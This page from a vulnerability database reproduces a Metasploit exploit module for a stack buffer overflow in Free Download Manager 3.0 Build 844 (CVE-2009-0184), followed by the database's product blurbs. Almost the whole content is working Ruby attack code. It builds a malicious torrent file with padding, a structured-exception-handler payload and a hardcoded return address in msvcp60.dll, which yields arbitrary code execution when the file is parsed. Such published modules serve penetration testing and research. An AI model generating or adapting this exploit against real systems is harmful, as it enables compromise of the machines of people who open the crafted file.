Lucene search
K

Free Download Manager Torrent Parsing Buffer Overflow

🗓️ 10 Nov 2009 21:52:17Reported by SkD <[email protected]>, jduck <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 49 Views

Free Download Manager Torrent Parsing Buffer Overflow. Exploits stack buffer overflow in Free Download Manager 3.0 Build 844 with specially crafted torrent fil

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Free Download Manager Torrent Parsing Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Free Download Manager
        3.0 Build 844. Arbitrary code execution could occur when parsing a
        specially crafted torrent file.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'SkD <skdrat[at]hotmail.com>',
          'jduck',
        ],
      'References'     =>
        [
          [ 'CVE', '2009-0184' ],
          [ 'OSVDB', '54033' ],
          [ 'BID', '33555' ],
          [ 'URL', 'http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18' ],
          [ 'URL', 'http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18' ],
          [ 'URL', 'http://web.archive.org/web/20090205145829/http://secunia.com:80/secunia_research/2009-5' ],
          [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'DisableNops'   =>  'True',
          'BadChars' => "\x00\x2c\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [ 'Free Download Manager 3.0 (Build 844)',
            {
              'Ret' => 0x76051372 # pop/pop/ret @ msvcp60.dll
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2009-02-02',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.torrent']),
      ])
  end

  def exploit

    bof = rand_text_alphanumeric(10004) + generate_seh_payload(target.ret)
    # hit the end of the stack...
    bof << rand_text(1000) * 50

    len = rand(10*1024*1024)
    info_hash = {
      'length' => len,
      'name' => bof,
      'piece length' => len + rand(262144 - len),
      'pieces' => rand_text(20),
    }

    ann_hash = {
      'info' => info_hash,
    }

    encoded = bencode_hash(ann_hash)

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(encoded)

  end

  # bencoding functions:
  #
  # http://wiki.theory.org/BitTorrentSpecification
  #
  def bencode_string(str)
    ret = "%d:" % str.length
    ret << str
    return ret
  end

  def bencode_int(int)
    ret = "i%de" % int
    return ret
  end

  def bencode_item(item)
    case item
    when Integer
      return bencode_int(item)
    when String
      return bencode_string(item)
    when Hash
      return bencode_hash(item)
    else
      throw("unsupported bencode data type! " + item.testzt)
    end
  end

  def bencode_list(list)
    ret = "l"
    list.each do |el|
      ret << bencode_item(el)
    end
    ret << "e"
    return ret
  end

  def bencode_hash(hash)
    ret = "d"
    hash.keys.sort.each do |k|
      ret << bencode_item(k)
      ret << bencode_item(hash[k])
    end
    ret << "e"
    return ret
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation